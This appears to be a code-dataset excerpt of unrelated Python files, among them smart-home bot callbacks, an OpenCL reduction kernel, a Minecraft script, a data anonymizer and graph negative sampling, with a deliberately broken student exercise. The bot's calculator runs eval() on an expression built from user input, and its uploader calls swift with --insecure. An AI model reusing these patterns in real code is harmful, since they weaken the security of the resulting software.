response = urllib2.urlopen(url, timeout=time)
html = response.read()
response.close()
m = re.compile(
r'<p class="summary"><p>(.+)<div class="card-info">',
re.DOTALL
).search(html)
if m:
content = m.group(1)
return Util.strip_tags(content), url
else:
return None, None
except Exception, ex:
ERROR("wiki error: ", ex)
return None, None
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入内容, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if not msg is None:
self._home.publish_msg(cmd, u"正在搜索...")
res, url = self.searchWiki(msg)
if res is None:
self._home.publish_msg(cmd, u"无百科内容")
else:
res = res.decode("utf-8")
if len(res) > 140:
res = res[:140]
msg = u"百度百科:\n %s...\n%s" \
% (res, url)
self._home.publish_msg(cmd, msg)
else:
self._home.publish_msg(cmd, u"无百科内容")
return True
class cal_callback(Callback.Callback):
_ops = {
u'加':'+',
u'减':'-',
u'乘':'*',
u'除':'/',
u'+':'+',
u'-':'-',
u'*':'*',
u'/':'/',
u'(':'(',
u'(':'(',
u')':')',
u')':')',
}
def _parse_tokens(self, src):
tokens = []
cur_t = u''
for term in src:
if term in cal_callback._ops:
if cur_t != u'':
tokens.append(cur_t)
cur_t = u''
tokens.append(term)
else:
cur_t += term
if cur_t != u'':
tokens.append(cur_t)
return tokens
def _parse_expression(self, tokens):
expression = u''
for token in tokens:
if token in cal_callback._ops:
expression += cal_callback._ops[token]
else:
num = Util.cn2dig(token)
if num is None:
return None
expression += str(num)
res = None
INFO("expression: " + expression)
try:
res = eval(expression)
res = Decimal.from_float(res).quantize(Decimal('0.00'))
except Exception, ex:
ERROR("cal expression error:", ex)
return res
def callback(self, cmd, msg):
if Util.empty_str(msg):
cancel_flag = u"取消"
finish_flag = u"完成"
self._home.publish_msg(
cmd
, u"请输入公式, 输入\"%s\"或\"%s\"结束:" % (finish_flag, cancel_flag)
, cmd_type="input"
)
msg = UserInput(self._home).waitForInput(
finish=finish_flag,
cancel=cancel_flag)
if msg is None:
self._home.publish_msg(cmd, u"无公式内容")
else:
tokens = self._parse_tokens(msg)
if not tokens is None:
res = self._parse_expression(tokens)
if not res is None:
self._home.publish_msg(cmd, u"%s = %s" % (msg, str(res)))
return True, res
else:
self._home.publish_msg(cmd, u"计算出错")
return True, None
else:
self._home.publish_msg(cmd, u"格式有误")
return True, None
class camera_quickshot_callback(Callback.Callback):
IMAGE_SERVER_URL = "http://lehome.sinaapp.com/image"
IMAGE_HOST_URL = "http://lehome-image.stor.sinaapp.com/"
def _upload_image(self, img_src, thumbnail_src):
if img_src is None or len(img_src) == 0:
return None, None
INFO("uploading: %s %s" % (img_src, thumbnail_src))
# swift --insecure upload image data/capture/2015_05_23_001856.jpg
proc = subprocess.Popen(
[
"swift",
"--insecure",
"upload",
"image",
thumbnail_src,
img_src
],
stdout=subprocess.PIPE
)
read_img = None
read_thumbnail = None
for i in range(2) :
try:
data = proc.stdout.readline().strip() #block / wait
INFO("swift readline: %s" % data)
if data.endswith(".thumbnail.jpg"):
INFO("save to storage:%s" % data)
read_thumbnail = camera_quickshot_callback.IMAGE_HOST_URL + data
elif data.endswith(".jpg"):
INFO("save to storage:%s" % data)
read_img = camera_quickshot_callback.IMAGE_HOST_URL + data
if not read_img is None and not read_thumbnail is None:
return read_img, read_thumbnail
except (KeyboardInterrupt, SystemExit):
raise
except Exception, ex:
ERROR(ex)
break
return None, None
def callback(self, cmd, msg):
self._home.publish_msg(cmd, u"正在截图...")
Sound.notice(Res.get_res_path("sound/com_shoot"))
save_path="data/capture/"
save_name, thumbnail_name = CameraHelper().take_a_photo(save_path)
# for test
# save_name = "2015_05_02_164052.jpg"
if save_name is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("capture faild.")
return True
img_url, thumbnail_url = self._upload_image(
save_path + save_name,
save_path + thumbnail_name,
)
if img_url is None:
self._home.publish_msg(cmd, u"截图失败")
INFO("upload capture faild.")
return True
else:
self._home.publish_msg(
cmd,
msg=img_url,
cmd_type="capture"
)
return True
class push_info_callback(Callback.Callback):
def callback(self, cmd, target, msg):
if target is None or len(target) == 0:
if msg is None or len(msg) == 0:
self._home.publish_msg(cmd, u"请输入内容")
return True, None
self._home.publish_msg(cmd, msg)
DEBUG("show_callback: %s" % msg)
return True, msg
return True, "push"
| [] |
Athenian-Computer-Science/numeric-operations-1-practice-template | src/fix_code_1.py | cdfe370ced98c5e4c770bb89bb7faf0da31ea985 | #############################
# Collaborators: (enter people or resources who/that helped you)
# If none, write none
#
#
#############################
base = input('Enter the base: ")
height =
area = # Calculate the area of the triangle
print("The area of the triangle is (area).") | [] |
gmazzamuto/gputools | gputools/core/oclmultireduction.py | 73a4dee76a119f94d8163781a85b691fd080d506 | """
an adaptation of pyopencl's reduction kernel for weighted avarages
like sum(a*b)
[email protected]
"""
from __future__ import print_function, unicode_literals, absolute_import, division
from six.moves import zip
import pyopencl as cl
from pyopencl.tools import (
context_dependent_memoize,
dtype_to_ctype, KernelTemplateBase,
_process_code_for_macro)
import numpy as np
from gputools import get_device
import sys
# {{{ kernel source
KERNEL = r"""//CL//
<%
inds = range(len(map_exprs))
%>
#define GROUP_SIZE ${group_size}
% for i,m in enumerate(map_exprs):
#define READ_AND_MAP_${i}(i) (${m})
% endfor
#define REDUCE(a, b) (${reduce_expr})
% if double_support:
#if __OPENCL_C_VERSION__ < 120
#pragma OPENCL EXTENSION cl_khr_fp64: enable
#endif
#define PYOPENCL_DEFINE_CDOUBLE
% endif
#include <pyopencl-complex.h>
${preamble}
typedef ${out_type} out_type;
__kernel void ${name}(
% for i in inds:
__global out_type *out__base_${i},
% endfor
long out__offset, ${arguments},
unsigned int seq_count, unsigned int n)
{
% for i in inds:
__global out_type *out_${i} = (__global out_type *) (
(__global char *) out__base_${i} + out__offset);
% endfor
${arg_prep}
% for i in inds:
__local out_type ldata_${i}[GROUP_SIZE];
out_type acc_${i} = ${neutral};
% endfor
unsigned int lid = get_local_id(0);
unsigned int i = get_group_id(0)*GROUP_SIZE*seq_count + lid;
//printf("seq: %d\tlid = %d\ti=%d\n",seq_count,lid,i);
for (unsigned s = 0; s < seq_count; ++s)
{
if (i >= n)
break;
% for i in inds:
acc_${i} = REDUCE(acc_${i}, READ_AND_MAP_${i}(i));
% endfor
i += GROUP_SIZE;
}
% for i in inds:
ldata_${i}[lid] = acc_${i};
% endfor
<%
cur_size = group_size
%>
% while cur_size > 1:
barrier(CLK_LOCAL_MEM_FENCE);
<%
new_size = cur_size // 2
assert new_size * 2 == cur_size
%>
if (lid < ${new_size})
{
% for i in inds:
ldata_${i}[lid] = REDUCE(
ldata_${i}[lid],
ldata_${i}[lid + ${new_size}]);
% endfor
}
<% cur_size = new_size %>
% endwhile
if (lid == 0) {
% for i in inds:
out_${i}[get_group_id(0)] = ldata_${i}[0];
% endfor
//printf("result: %.4f\n",out_0[get_group_id(0)] );
}
}
"""
def _get_reduction_source(
ctx, out_type, out_type_size,
neutral, reduce_expr, map_exprs, parsed_args,
name="reduce_kernel", preamble="", arg_prep="",
device=None, max_group_size=None):
if device is not None:
devices = [device]
else:
devices = ctx.devices
# {{{ compute group size
def get_dev_group_size(device):
# dirty fix for the RV770 boards
max_work_group_size = device.max_work_group_size
if "RV770" in device.name:
max_work_group_size = 64
# compute lmem limit
from pytools import div_ceil
lmem_wg_size = div_ceil(max_work_group_size, out_type_size)
result = min(max_work_group_size, lmem_wg_size)
# round down to power of 2
from pyopencl.tools import bitlog2
return 2**bitlog2(result)
group_size = min(get_dev_group_size(dev) for dev in devices)
if max_group_size is not None:
group_size = min(max_group_size, group_size)
# }}}
from mako.template import Template
from pytools import all
from pyopencl.characterize import has_double_support
src = str(Template(KERNEL).render(
out_type=out_type,
arguments=", ".join(arg.declarator() for arg in parsed_args),
group_size=group_size,
neutral=neutral,
reduce_expr=_process_code_for_macro(reduce_expr),
map_exprs=[_process_code_for_macro(m) for m in map_exprs],
name=name,
preamble=preamble,
arg_prep=arg_prep,
double_support=all(has_double_support(dev) for dev in devices),
))
# sys.exit()
from pytools import Record
class ReductionInfo(Record):
pass
return ReductionInfo(
context=ctx,
source=src,
group_size=group_size)
def get_reduction_kernel(stage,
ctx, dtype_out,
neutral, reduce_expr, arguments=None,
name="reduce_kernel", preamble="",
map_exprs = None,
device=None, options=[], max_group_size=None):
if map_exprs is None:
raise ValueError("map_exprs has to be given!")
for i, m in enumerate(map_exprs):
if m is None:
if stage==2:
map_exprs[i] = "pyopencl_reduction_inp_%i[i]"%i
else:
map_exprs[i] = "in[i]"
from pyopencl.tools import (
parse_arg_list, get_arg_list_scalar_arg_dtypes,
get_arg_offset_adjuster_code, VectorArg)
arg_prep = ""
if stage==1 and arguments is not None:
arguments = parse_arg_list(arguments, with_offset=True)
arg_prep = get_arg_offset_adjuster_code(arguments)
if stage==2 and arguments is not None:
arguments = parse_arg_list(arguments)
arguments = (
[VectorArg(dtype_out, "pyopencl_reduction_inp_%i"%i) for i in range(len(map_exprs))]
+arguments)
inf = _get_reduction_source(
ctx, dtype_to_ctype(dtype_out), dtype_out.itemsize,
neutral, reduce_expr, map_exprs, arguments,
name, preamble, arg_prep, device, max_group_size)
inf.program = cl.Program(ctx, inf.source)
inf.program.build(options)
inf.kernel = getattr(inf.program, name)
inf.arg_types = arguments
inf.kernel.set_scalar_arg_dtypes(
[None, ]*len(map_exprs)+[np.int64]
+get_arg_list_scalar_arg_dtypes(inf.arg_types)
+[np.uint32]*2)
return inf
# }}}
# {{{ main reduction kernel
class OCLMultiReductionKernel:
"""
simultanous reduction of a weighted sum of severalbuffers
example:
k = OCLMultiReduction(np.float32,
neutral="0",reduce_expr="a+b",
map_exprs = ["x[i]", "x[i]*y[i]"],
arguments="__global float *x,__global float *y")
k(a,b, out1 = out1, out2 = out2)
"""
def __init__(self, dtype_out,
neutral, reduce_expr, arguments=None,
map_exprs=[None],
name="reduce_kernel", options=[], preamble=""):
ctx = get_device().context
dtype_out = self.dtype_out = np.dtype(dtype_out)
max_group_size = None
trip_count = 0
self.n_exprs = len(map_exprs)
assert self.n_exprs>0
while True:
self.stage_1_inf = get_reduction_kernel(1, ctx,
dtype_out,
neutral, reduce_expr, arguments,
name=name+"_stage1", options=options, preamble=preamble,
map_exprs=map_exprs,
max_group_size=max_group_size)
kernel_max_wg_size = self.stage_1_inf.kernel.get_work_group_info(
cl.kernel_work_group_info.WORK_GROUP_SIZE,
ctx.devices[0])
if self.stage_1_inf.group_size<=kernel_max_wg_size:
break
else:
max_group_size = kernel_max_wg_size
trip_count += 1
assert trip_count<=2
self.stage_2_inf = get_reduction_kernel(2, ctx,
dtype_out,
neutral, reduce_expr, arguments=arguments,
name=name+"_stage2", options=options,
map_exprs = [None]*self.n_exprs,
preamble=preamble,
max_group_size=max_group_size)
from pytools import any
from pyopencl.tools import VectorArg
assert any(
isinstance(arg_tp, VectorArg)
for arg_tp in self.stage_1_inf.arg_types), \
"ReductionKernel can only be used with functions " \
"that have at least one vector argument"
def __call__(self, *args, **kwargs):
MAX_GROUP_COUNT = 1024 # noqa
SMALL_SEQ_COUNT = 4 # noqa
from pyopencl.array import empty
stage_inf = self.stage_1_inf
queue = kwargs.pop("queue", None)
wait_for = kwargs.pop("wait_for", None)
return_event = kwargs.pop("return_event", False)
outs = kwargs.pop("outs", [None]*self.n_exprs)
if kwargs:
raise TypeError("invalid keyword argument to reduction kernel")
stage1_args = args
while True:
invocation_args = []
vectors = []
from pyopencl.tools import VectorArg
for arg, arg_tp in zip(args, stage_inf.arg_types):
if isinstance(arg_tp, VectorArg):
if not arg.flags.forc:
raise RuntimeError("ReductionKernel cannot "
"deal with non-contiguous arrays")
vectors.append(arg)
invocation_args.append(arg.base_data)
if arg_tp.with_offset:
invocation_args.append(arg.offset)
else:
invocation_args.append(arg)
repr_vec = vectors[0]
sz = repr_vec.size
if queue is not None:
use_queue = queue
else:
use_queue = repr_vec.queue
if sz<=stage_inf.group_size*SMALL_SEQ_COUNT*MAX_GROUP_COUNT:
total_group_size = SMALL_SEQ_COUNT*stage_inf.group_size
group_count = (sz+total_group_size-1)//total_group_size
seq_count = SMALL_SEQ_COUNT
else:
group_count = MAX_GROUP_COUNT
macrogroup_size = group_count*stage_inf.group_size
seq_count = (sz+macrogroup_size-1)//macrogroup_size
if group_count==1:
results = [empty(use_queue,
(), self.dtype_out,
allocator=repr_vec.allocator) if out is None else out for out in outs]
else:
results = [empty(use_queue,
(group_count,), self.dtype_out,
allocator=repr_vec.allocator) for out in outs]
last_evt = stage_inf.kernel(
use_queue,
(group_count*stage_inf.group_size,),
(stage_inf.group_size,),
*([r.base_data for r in results]+[results[0].offset,]
+invocation_args+[seq_count, sz]),
**dict(wait_for=wait_for))
wait_for = [last_evt]
#print "ooooo ", group_count, len(args)
if group_count==1:
if return_event:
return results, last_evt
else:
return results
else:
stage_inf = self.stage_2_inf
args = tuple(results)+stage1_args
#args = (results[0],)+stage1_args
if __name__=='__main__':
from gputools import OCLArray, OCLReductionKernel
k1 = OCLReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_expr="x[i]",
arguments="__global float *x")
k2 = OCLMultiReductionKernel(np.float32,
neutral="0", reduce_expr="a+b",
map_exprs=["y[i]*x[i]","x[i]"],
arguments="__global float *x, __global float *y")
N = 512
a = OCLArray.from_array(np.ones((N,N),np.float32))
b = OCLArray.from_array(2.*np.ones((N,N),np.float32))
o1 = OCLArray.empty((),np.float32)
o2 = OCLArray.empty((),np.float32)
from time import time
t = time()
for _ in range(400):
k1(a)
k1(b)
k1(a).get()
k1(b).get()
print(time()-t)
t = time()
#print k2(a,b, outs = [o1,o2])
for _ in range(400):
k2(a[0],b[0], outs = [o1,o2])
o1.get()
print(time()-t)
# open("kern_new_1.txt","w").write(("%s"%k2.stage_1_inf).replace("\\n","\n"))
# open("kern_new_2.txt","w").write(("%s"%k2.stage_2_inf).replace("\\n","\n"))
| [((5967, 5994), 'pyopencl.Program', 'cl.Program', (['ctx', 'inf.source'], {}), '(ctx, inf.source)\n', (5977, 5994), True, 'import pyopencl as cl\n'), ((11888, 12003), 'gputools.OCLReductionKernel', 'OCLReductionKernel', (['np.float32'], {'neutral': '"""0"""', 'reduce_expr': '"""a+b"""', 'map_expr': '"""x[i]"""', 'arguments': '"""__global float *x"""'}), "(np.float32, neutral='0', reduce_expr='a+b', map_expr=\n 'x[i]', arguments='__global float *x')\n", (11906, 12003), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12482, 12512), 'gputools.OCLArray.empty', 'OCLArray.empty', (['()', 'np.float32'], {}), '((), np.float32)\n', (12496, 12512), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12521, 12551), 'gputools.OCLArray.empty', 'OCLArray.empty', (['()', 'np.float32'], {}), '((), np.float32)\n', (12535, 12551), False, 'from gputools import OCLArray, OCLReductionKernel\n'), ((12587, 12593), 'time.time', 'time', ([], {}), '()\n', (12591, 12593), False, 'from time import time\n'), ((12710, 12716), 'time.time', 'time', ([], {}), '()\n', (12714, 12716), False, 'from time import time\n'), ((3405, 3449), 'pytools.div_ceil', 'div_ceil', (['max_work_group_size', 'out_type_size'], {}), '(max_work_group_size, out_type_size)\n', (3413, 3449), False, 'from pytools import div_ceil\n'), ((5407, 5450), 'pyopencl.tools.parse_arg_list', 'parse_arg_list', (['arguments'], {'with_offset': '(True)'}), '(arguments, with_offset=True)\n', (5421, 5450), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5470, 5509), 'pyopencl.tools.get_arg_offset_adjuster_code', 'get_arg_offset_adjuster_code', (['arguments'], {}), '(arguments)\n', (5498, 5509), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5574, 5599), 'pyopencl.tools.parse_arg_list', 'parse_arg_list', (['arguments'], {}), '(arguments)\n', (5588, 5599), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((5791, 5816), 'pyopencl.tools.dtype_to_ctype', 'dtype_to_ctype', (['dtype_out'], {}), '(dtype_out)\n', (5805, 5816), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((6953, 6972), 'numpy.dtype', 'np.dtype', (['dtype_out'], {}), '(dtype_out)\n', (6961, 6972), True, 'import numpy as np\n'), ((12386, 12413), 'numpy.ones', 'np.ones', (['(N, N)', 'np.float32'], {}), '((N, N), np.float32)\n', (12393, 12413), True, 'import numpy as np\n'), ((3603, 3618), 'pyopencl.tools.bitlog2', 'bitlog2', (['result'], {}), '(result)\n', (3610, 3618), False, 'from pyopencl.tools import bitlog2\n'), ((6895, 6907), 'gputools.get_device', 'get_device', ([], {}), '()\n', (6905, 6907), False, 'from gputools import get_device\n'), ((9407, 9437), 'six.moves.zip', 'zip', (['args', 'stage_inf.arg_types'], {}), '(args, stage_inf.arg_types)\n', (9410, 9437), False, 'from six.moves import zip\n'), ((12444, 12471), 'numpy.ones', 'np.ones', (['(N, N)', 'np.float32'], {}), '((N, N), np.float32)\n', (12451, 12471), True, 'import numpy as np\n'), ((12690, 12696), 'time.time', 'time', ([], {}), '()\n', (12694, 12696), False, 'from time import time\n'), ((12839, 12845), 'time.time', 'time', ([], {}), '()\n', (12843, 12845), False, 'from time import time\n'), ((3927, 3943), 'mako.template.Template', 'Template', (['KERNEL'], {}), '(KERNEL)\n', (3935, 3943), False, 'from mako.template import Template\n'), ((4125, 4161), 'pyopencl.tools._process_code_for_macro', '_process_code_for_macro', (['reduce_expr'], {}), '(reduce_expr)\n', (4148, 4161), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((5635, 5688), 'pyopencl.tools.VectorArg', 'VectorArg', (['dtype_out', "('pyopencl_reduction_inp_%i' % i)"], {}), "(dtype_out, 'pyopencl_reduction_inp_%i' % i)\n", (5644, 5688), False, 'from pyopencl.tools import VectorArg\n'), ((6192, 6237), 'pyopencl.tools.get_arg_list_scalar_arg_dtypes', 'get_arg_list_scalar_arg_dtypes', (['inf.arg_types'], {}), '(inf.arg_types)\n', (6222, 6237), False, 'from pyopencl.tools import parse_arg_list, get_arg_list_scalar_arg_dtypes, get_arg_offset_adjuster_code, VectorArg\n'), ((4182, 4208), 'pyopencl.tools._process_code_for_macro', '_process_code_for_macro', (['m'], {}), '(m)\n', (4205, 4208), False, 'from pyopencl.tools import context_dependent_memoize, dtype_to_ctype, KernelTemplateBase, _process_code_for_macro\n'), ((10886, 10964), 'pyopencl.array.empty', 'empty', (['use_queue', '(group_count,)', 'self.dtype_out'], {'allocator': 'repr_vec.allocator'}), '(use_queue, (group_count,), self.dtype_out, allocator=repr_vec.allocator)\n', (10891, 10964), False, 'from pyopencl.array import empty\n'), ((4330, 4353), 'pyopencl.characterize.has_double_support', 'has_double_support', (['dev'], {}), '(dev)\n', (4348, 4353), False, 'from pyopencl.characterize import has_double_support\n'), ((10667, 10733), 'pyopencl.array.empty', 'empty', (['use_queue', '()', 'self.dtype_out'], {'allocator': 'repr_vec.allocator'}), '(use_queue, (), self.dtype_out, allocator=repr_vec.allocator)\n', (10672, 10733), False, 'from pyopencl.array import empty\n')] |
DidymusRex/PiCraft | mineshaft.py | 07b7dad2e68a2473e4314c9b77cb82abce41ae97 | #! /usr/bin/env python
import mcpi.minecraft as minecraft
import mcpi.block as block
import random
import time
mc = minecraft.Minecraft.create()
# ----------------------------------------------------------------------
# S E T U P
# ----------------------------------------------------------------------
# Where Am I?
pos = mc.player.getTilePos()
print "Game center point is %d, %d, %d" % (pos.x, pos.y, pos.z)
limit=256
mc.setBlocks(pos.x, pos.y, pos.z, pos.x+10, pos.y-256, pos.z+10, block.AIR.id)
mc.setBlocks(pos.x, pos.y, pos.z, pos.x-10, pos.y+256, pos.z-10, block.DIAMOND_ORE.id)
| [] |
ChenglongChen/TextRank4ZH | example/example01.py | 5af7b9d33d9e686411576362dfccf6f9d3d3282b | #-*- encoding:utf-8 -*-
from __future__ import print_function
import sys
try:
reload(sys)
sys.setdefaultencoding('utf-8')
except:
pass
import codecs
from textrank4zh import TextRank4Keyword, TextRank4Sentence
text = codecs.open('../test/doc/01.txt', 'r', 'utf-8').read()
tr4w = TextRank4Keyword()
tr4w.analyze(text=text, lower=True, window=2) # py2中text必须是utf8编码的str或者unicode对象,py3中必须是utf8编码的bytes或者str对象
print( '关键词:' )
for item in tr4w.get_keywords(20, word_min_len=1):
print(item.word, item.weight)
print()
print( '关键短语:' )
for phrase in tr4w.get_keyphrases(keywords_num=20, min_occur_num= 2):
print(phrase)
tr4s = TextRank4Sentence()
tr4s.analyze(text=text, lower=True, source = 'all_filters')
print()
print( '摘要:' )
for item in tr4s.get_key_sentences(num=3):
print(item.weight, item.sentence) | [((293, 311), 'textrank4zh.TextRank4Keyword', 'TextRank4Keyword', ([], {}), '()\n', (309, 311), False, 'from textrank4zh import TextRank4Keyword, TextRank4Sentence\n'), ((647, 666), 'textrank4zh.TextRank4Sentence', 'TextRank4Sentence', ([], {}), '()\n', (664, 666), False, 'from textrank4zh import TextRank4Keyword, TextRank4Sentence\n'), ((99, 130), 'sys.setdefaultencoding', 'sys.setdefaultencoding', (['"""utf-8"""'], {}), "('utf-8')\n", (121, 130), False, 'import sys\n'), ((231, 278), 'codecs.open', 'codecs.open', (['"""../test/doc/01.txt"""', '"""r"""', '"""utf-8"""'], {}), "('../test/doc/01.txt', 'r', 'utf-8')\n", (242, 278), False, 'import codecs\n')] |
suutari-ai/respa | scripts/anonymize_dumpdata.py | a944b1c13f855eaf5f883687b5fd025ece7c8176 | import random
import uuid
import sys
import json
from faker import Factory
from faker.providers.person.fi_FI import Provider as PersonProvider
fake = Factory.create('fi_FI')
email_by_user = {}
users_by_id = {}
def anonymize_users(users):
usernames = set()
emails = set()
for data in users:
if data['model'] != 'users.user':
continue
user = data['fields']
user['password'] = "!"
username = fake.user_name()
while username in usernames:
username = fake.user_name()
usernames.add(username)
user['username'] = username
user['uuid'] = str(uuid.uuid4())
if user['first_name']:
user['first_name'] = fake.first_name()
if user['last_name']:
user['last_name'] = fake.last_name()
user['email'] = fake.email()
email_by_user[data['pk']] = user['email']
users_by_id[data['pk']] = user
def remove_secrets(data):
for model in data:
fields = model['fields']
if model['model'] == 'socialaccount.socialapp':
fields['client_id'] = fake.md5()
fields['secret'] = fake.md5()
elif model['model'] == 'socialaccount.socialapp':
fields['token_secret'] = fake.md5()
fields['token'] = fake.md5()
elif model['model'] == 'account.emailaddress':
fields['email'] = email_by_user[fields['user']]
elif model['model'] == 'socialaccount.socialaccount':
fields['extra_data'] = '{}'
fields['uid'] = users_by_id[fields['user']]['uuid']
elif model['model'] == 'sessions.session':
fields['session_data'] = "!"
model['pk'] = fake.md5()
data = json.load(sys.stdin)
anonymize_users(data)
remove_secrets(data)
json.dump(data, sys.stdout, indent=4)
| [((151, 174), 'faker.Factory.create', 'Factory.create', (['"""fi_FI"""'], {}), "('fi_FI')\n", (165, 174), False, 'from faker import Factory\n'), ((1731, 1751), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (1740, 1751), False, 'import json\n'), ((1795, 1832), 'json.dump', 'json.dump', (['data', 'sys.stdout'], {'indent': '(4)'}), '(data, sys.stdout, indent=4)\n', (1804, 1832), False, 'import json\n'), ((639, 651), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (649, 651), False, 'import uuid\n')] |
NucciTheBoss/pytorch_geometric | torch_geometric/utils/negative_sampling.py | e220a2c08fa1b2f1672d616c22eac2a67b5c8967 | import random
from typing import Optional, Tuple, Union
import numpy as np
import torch
from torch import Tensor
from torch_geometric.utils import coalesce, degree, remove_self_loops
from .num_nodes import maybe_num_nodes
def negative_sampling(edge_index: Tensor,
num_nodes: Optional[Union[int, Tuple[int, int]]] = None,
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False) -> Tensor:
r"""Samples random negative edges of a graph given by :attr:`edge_index`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int or Tuple[int, int], optional): The number of nodes,
*i.e.* :obj:`max_val + 1` of :attr:`edge_index`.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph with shape :obj:`(num_src_nodes, num_dst_nodes)`.
(default: :obj:`None`)
num_neg_samples (int, optional): The (approximate) number of negative
samples to return.
If set to :obj:`None`, will try to return a negative edge for every
positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
assert method in ['sparse', 'dense']
size = num_nodes
bipartite = isinstance(size, (tuple, list))
size = maybe_num_nodes(edge_index) if size is None else size
size = (size, size) if not bipartite else size
force_undirected = False if bipartite else force_undirected
idx, population = edge_index_to_vector(edge_index, size, bipartite,
force_undirected)
if idx.numel() >= population:
return edge_index.new_empty((2, 0))
if num_neg_samples is None:
num_neg_samples = edge_index.size(1)
if force_undirected:
num_neg_samples = num_neg_samples // 2
prob = 1. - idx.numel() / population # Probability to sample a negative.
sample_size = int(1.1 * num_neg_samples / prob) # (Over)-sample size.
neg_idx = None
if method == 'dense':
# The dense version creates a mask of shape `population` to check for
# invalid samples.
mask = idx.new_ones(population, dtype=torch.bool)
mask[idx] = False
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, idx.device)
rnd = rnd[mask[rnd]] # Filter true negatives.
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
mask[neg_idx] = False
else: # 'sparse'
# The sparse version checks for invalid samples via `np.isin`.
idx = idx.to('cpu')
for _ in range(3): # Number of tries to sample negative indices.
rnd = sample(population, sample_size, device='cpu')
mask = np.isin(rnd, idx)
if neg_idx is not None:
mask |= np.isin(rnd, neg_idx.to('cpu'))
mask = torch.from_numpy(mask).to(torch.bool)
rnd = rnd[~mask].to(edge_index.device)
neg_idx = rnd if neg_idx is None else torch.cat([neg_idx, rnd])
if neg_idx.numel() >= num_neg_samples:
neg_idx = neg_idx[:num_neg_samples]
break
return vector_to_edge_index(neg_idx, size, bipartite, force_undirected)
def batched_negative_sampling(
edge_index: Tensor,
batch: Union[Tensor, Tuple[Tensor, Tensor]],
num_neg_samples: Optional[int] = None,
method: str = "sparse",
force_undirected: bool = False,
) -> Tensor:
r"""Samples random negative edges of multiple graphs given by
:attr:`edge_index` and :attr:`batch`.
Args:
edge_index (LongTensor): The edge indices.
batch (LongTensor or Tuple[LongTensor, LongTensor]): Batch vector
:math:`\mathbf{b} \in {\{ 0, \ldots, B-1\}}^N`, which assigns each
node to a specific example.
If given as a tuple, then :obj:`edge_index` is interpreted as a
bipartite graph connecting two different node types.
num_neg_samples (int, optional): The number of negative samples to
return. If set to :obj:`None`, will try to return a negative edge
for every positive edge. (default: :obj:`None`)
method (string, optional): The method to use for negative sampling,
*i.e.*, :obj:`"sparse"` or :obj:`"dense"`.
This is a memory/runtime trade-off.
:obj:`"sparse"` will work on any graph of any size, while
:obj:`"dense"` can perform faster true-negative checks.
(default: :obj:`"sparse"`)
force_undirected (bool, optional): If set to :obj:`True`, sampled
negative edges will be undirected. (default: :obj:`False`)
:rtype: LongTensor
"""
if isinstance(batch, Tensor):
src_batch, dst_batch = batch, batch
else:
src_batch, dst_batch = batch[0], batch[1]
split = degree(src_batch[edge_index[0]], dtype=torch.long).tolist()
edge_indices = torch.split(edge_index, split, dim=1)
num_src = degree(src_batch, dtype=torch.long)
cum_src = torch.cat([src_batch.new_zeros(1), num_src.cumsum(0)[:-1]])
if isinstance(batch, Tensor):
num_nodes = num_src.tolist()
cumsum = cum_src
else:
num_dst = degree(dst_batch, dtype=torch.long)
cum_dst = torch.cat([dst_batch.new_zeros(1), num_dst.cumsum(0)[:-1]])
num_nodes = torch.stack([num_src, num_dst], dim=1).tolist()
cumsum = torch.stack([cum_src, cum_dst], dim=1).unsqueeze(-1)
neg_edge_indices = []
for i, edge_index in enumerate(edge_indices):
edge_index = edge_index - cumsum[i]
neg_edge_index = negative_sampling(edge_index, num_nodes[i],
num_neg_samples, method,
force_undirected)
neg_edge_index += cumsum[i]
neg_edge_indices.append(neg_edge_index)
return torch.cat(neg_edge_indices, dim=1)
def structured_negative_sampling(edge_index, num_nodes: Optional[int] = None,
contains_neg_self_loops: bool = True):
r"""Samples a negative edge :obj:`(i,k)` for every positive edge
:obj:`(i,j)` in the graph given by :attr:`edge_index`, and returns it as a
tuple of the form :obj:`(i,j,k)`.
Args:
edge_index (LongTensor): The edge indices.
num_nodes (int, optional): The number of nodes, *i.e.*
:obj:`max_val + 1` of :attr:`edge_index`. (default: :obj:`None`)
contains_neg_self_loops (bool, optional): If set to
:obj:`False`, sampled negative edges will not contain self loops.
(default: :obj:`True`)
:rtype: (LongTensor, LongTensor, LongTensor)
"""
num_nodes = maybe_num_nodes(edge_index, num_nodes)
row, col = edge_index.cpu()
pos_idx = row * num_nodes + col
if not contains_neg_self_loops:
loop_idx = torch.arange(num_nodes) * (num_nodes + 1)
pos_idx = torch.cat([pos_idx, loop_idx], dim=0)
